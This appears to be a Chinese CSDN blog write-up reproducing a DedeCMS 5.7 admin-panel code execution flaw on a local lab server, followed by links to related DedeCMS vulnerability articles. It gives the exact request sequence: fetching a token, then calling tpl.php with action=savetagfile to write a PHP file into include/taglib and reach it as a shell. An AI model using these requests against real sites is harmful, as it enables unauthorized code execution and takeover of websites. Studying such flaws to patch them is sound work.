织梦cms5.7 后台存在代码执行漏洞

最新推荐文章于 2024-04-07 01:45:27 发布
最新推荐文章于 2024-04-07 01:45:27 发布
阅读量1.6k 收藏 4
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38947035/article/details/105273771
版权

漏洞利用:
在本地搭建织梦cms,默认的后台地址为 域名/dede
因为后续的利用需要使用到token,然而登录成功后的数据包内并没有显示token值。所以需要访问如下链接获取token:
http://192.168.137.131/dede/tpl.php?action=upload
访问后查看页面源代码,获取到token
在这里插入图片描述
然后访问:
http://192.168.137.131/dede/tpl.php?filename=moonsec.lib.php&action=savetagfile&content=%3C?php%20phpinfo();?%3E&token=fc3851c93ca2fcf62bc099debd75edb2
写入代码成功,shell地址:
http://192.168.137.131/include/taglib/moonsec.lib.php
在这里插入图片描述

CODE_LW
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
【复现任务】织梦CMS前台任意用户密码修改漏洞简报
weixin_52852770的博客
11-29 3387
漏洞概述 1 简介 织梦内容管理系统(DedeCms) [1] 以简单、实用、开源而闻名,是国内最知名的 PHP 开源网站管理系统,也是使用用户最多的 PHP 类 CMS 系统,在经历多年的发展,目前的版本无论在功能,还是在易用性方面,都有了长足的发展和进步,DedeCms 免费版的主要目标用户锁定在个人站长,功能更专注于个人网站或中小型门户的构建,当然也不乏有企业用户和学校等在使用该系统。 2018 年 1 月 10 日, 锦行信息安全公众号公开了一个关于 DeDeCMS 前台任意用户密码修改漏洞
织梦CMS <=5.7 SP2 file_class.php 任意文件上传漏洞
zxy840552216的博客
06-02 235
漏洞 DedeCMS <=5.7 SP2 file_class.php 任意文件上传漏洞 简介 dedecms v5.7 sp2截至2019年2月19日的版本中对编辑相册文件上传校验不严导致可Getshell. 文件 /dede/file_class.php 修复 打开 /dede/file_class.php 找到大概在161行 else if(preg_match("/.(".$fileexp.")/i",$filename)) 改成 else i
漏洞复现--织梦CMS_V5.7任意用户密码重置漏洞
HengMengSec的博客
08-16 2078
织梦内容管理系统(DeDeCMS)以其简单、实用、开源的特点而著名。作为国内最知名的PHP开源网站管理系统,它在多年的发展中取得了显著进步,无论在功能还是易用性方面都有长足的发展。该系统广泛应用于中小型企业门户网站、个人网站、企业和学习网站建设。在中国,DedeCMS被认为是最受欢迎的CMS系统之一。但是,最近发现该系统的一个漏洞位于member/resetpassword.php文件中。由于未对接收的参数safeanswer进行严格的类型判断,攻击者可以利用弱类型比较来绕过安全措施。
漏洞复现--织梦CMS_V5(2),网络安全网络通信面试题
最新发布
m0_60666921的博客
04-07 944
织梦内容管理系统(DeDeCMS)以其简单、实用、开源的特点而著名。作为国内最知名的PHP开源网站管理系统,它在多年的发展中取得了显著进步,无论在功能还是易用性方面都有长足的发展。该系统广泛应用于中小型企业门户网站、个人网站、企业和学习网站建设。在中国,DedeCMS被认为是最受欢迎的CMS系统之一。但是,最近发现该系统的一个漏洞位于member/resetpassword.php文件中。由于未对接收的参数safeanswer进行严格的类型判断,攻击者可以利用弱类型比较来绕过安全措施。
织梦CMS后台快捷登陆 v1.0
11-05
织梦CMS后台快捷登陆是一款桌面程序,安装在电脑上的,不需要在我们任何平台登录,所配置的后台信息,账号密码,都保存在您本机上。只要您确认你的网站后台路径、账号密码保存在您电脑上是安全的,那您即可放心...
74cms代码执行漏洞
01-03
74cms代码执行漏洞 docker
织梦cms手机生成静态页插件_织梦cms手机生成静态页插件_
09-29
织梦CMS(DedeCMS)是一款广泛使用的开源内容管理系统,尤其在中国国内,它因其易用性和灵活性而受到许多网站管理员的青睐。手机生成静态页插件是针对织梦CMS的一个重要扩展,它允许用户为移动设备自动生成优化的...
织梦cmsdede手机端静态插件
02-14
织梦CMS(DedeCMS)是一款广泛应用于国内网站建设和管理的开源内容管理系统,以其灵活性和易用性受到许多开发者的青睐。"织梦cmsdede手机端静态插件"是针对该系统的一个重要扩展,旨在优化移动设备上的用户体验并...
骑士CMS远程代码执行.md
04-11
骑士CMS远程代码执行
DedeCms织梦系统漏洞复现
LIU6636LIU的博客
03-13 1985
1 部署好之后发现系统默认管理路径是dede,登陆管理后台可以通过地址然后有dedecms安全提示直接打开根目录修改dede文件夹为LYP重新进去管理员后台对数据进行还原看一下网站的地址接着生成新的网站然后即可访问网站,CMS搭建完毕首先打开后台管理页面开启会员功能这样就可以注册一个账户。
织梦CMS建站系统被曝漏洞 几十万网站沦为木马网站
08-02 771
最新消息,瑞星与 360 今日对外发布警示,称国内知名的 PHP 开源网站管理系统织梦 CMS(DedeCms)安装包被发现植入后门,黑客可通过此后门直接获得网站的控制权限,获取存储在服务器上的文件和数据库。 据第三方权威统计数据显示,目前约有 50 万网站使用该dedecms系统搭建,涉及企业、政府机关、媒体机构、行业及个人网站等。 安全界人士分析发现,此类文件被植入一句后门代码“@eval...
漏洞情报】复现任务
liangtaiwei的博客
12-13 2474
一、漏洞概述 织梦内容管理系统(DedeCms) [1] 以简单、实用、开源而闻名,是国内 最知名的 PHP 开源网站管理系统,也是使用用户最多的 PHP 类 CMS 系统, 在经历多年的发展,目前的版本无论在功能,还是在易用性方面,都有了长 足的发展和进步,DedeCms 免费版的主要目标用户锁定在个人站长,功能 更专注于个人网站或中小型门户的构建,当然也不乏有企业用户和学校等在 使用该系统。 2018 年 1 月 10 日, 锦行信息安全公众号公开了一个关于 DeDeCMS
Dedecms5.7漏洞利用
qq_48732306的博客
11-07 1259
Dedecms5.7渗透测试 Dedecms5.7由于编程的问题,有一个可以直接篡改用户密码的漏洞,一下是复现过程: 一:启动环境: 首先要进行dedecms的安装,其下载地址为:] DeDeCMS 官网 http://www.dedecms.com/ [2]。 不过要安装dedecms还要搭建好服务器,而我选择的是使用warmpserve来搭建的,这个软件包含了apache2,php与mysql数据库,安装了就可以一键运行服务器。 Dedecms的安装包含了两个文件,把uploads那个文件放在warms
织梦CMS阿里云提示漏洞修复方法
PHP错误汇总
11-20 276
站长***开始也是用的织梦cms,由于织梦cms经常报漏洞后来就换成了现在的帝国CMS。 dedecms漏洞问题都是众所周知的了,织梦cms在用阿里云ECS服务器的时候,阿里云服务器后都会提示各种各样的织梦CMS漏洞,dedecms漏洞。 遇到这种情况应该怎么办了,***方法就是修补这些提示的漏洞了。 如下图: 下面精准像素织梦CMS教程为大家搜集了一下这些漏洞的全部解决办法,以免大家到处去找,希望对大家有所帮助: 1、织梦dedecms common.inc.php文件SESSION变量覆盖.
织梦dedecms程序安全漏洞include/common.inc.php漏洞解决方法
winkexin的博客
03-23 431
1.受影响版本织梦dedecms 5.7、5.6、5.5。2.漏洞文件/include/common.inc.php 3.DEDECMS的全局变量初始化存在漏洞,可以任意覆盖任意全局变量。3.DEDECMS的全局变量初始化存在漏洞,可以任意覆盖任意全局变量。2.通过此漏洞进行各种越权操作构造漏洞直接写入webshell后门。2.漏洞文件/include/common.inc.php。1.受影响版本DEDECMS 5.7、5.6、5.5。1.黑客可以通过此漏洞来重定义数据库连接。文章到此为止 请自行完善吧。
织梦漏洞利用
weixin_53210070的博客
12-14 1564
Dedecms网站建立 php打开网站,开始安装 漏洞利用原理 dedecms系统中使用了SQL语句防注入功能引了的安全警告。在自定义模模型中使用了union|sleep|benchmark|load_file|outfile之一都会引发这个警告,此外采集的内容,如果有‘union 这类语法也会出现在这个警告。解决办法就是把安全检查关掉,打开include下面的dedesql.class.php 和dedesqli.class.php,$this->...
dedecms织梦后台存在SSRF漏洞怎么解决
09-05 379
设置之后我们就可以通过修改恶意服务端的设置来读取任意文件。假如读取的文件路径是以phar协议开头的,那么读取的文件内容就会被反序列化。根据dedecms代码,我们可以利用soapclient内置类来构造反序列化pop链来ssrf。dedecms后台存在ucenter功能,可以直接修改ucenter的配置,使网站的mysql连接。将生成的文件修改为dedecms.png,然后在dedecms上有很多地方都可以上传。上传成功之后可以从文件列表中获取到图片链接。设置完成之后,刷新就可以触发ssrf。
dedecms织梦日志暴露后台地址漏洞BUG修复
09-07 552
然后修改/include/common.inc.php中DEDEDATA变量,将:define('DEDEDATA', DEDEROOT.'/data');修改tplcache缓存文件目录:登陆后台 > 系统 > 系统基本参数 > 性能选项,将模板缓存目录值改为 /../data/tplcache。首先用FTP或远程登陆的方式将data/mysql_error_trace.inc更名成 mysql_error_你喜欢的任意字符.inc。通过FTP将/data/文件夹移至web根目录的上一级目录;
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值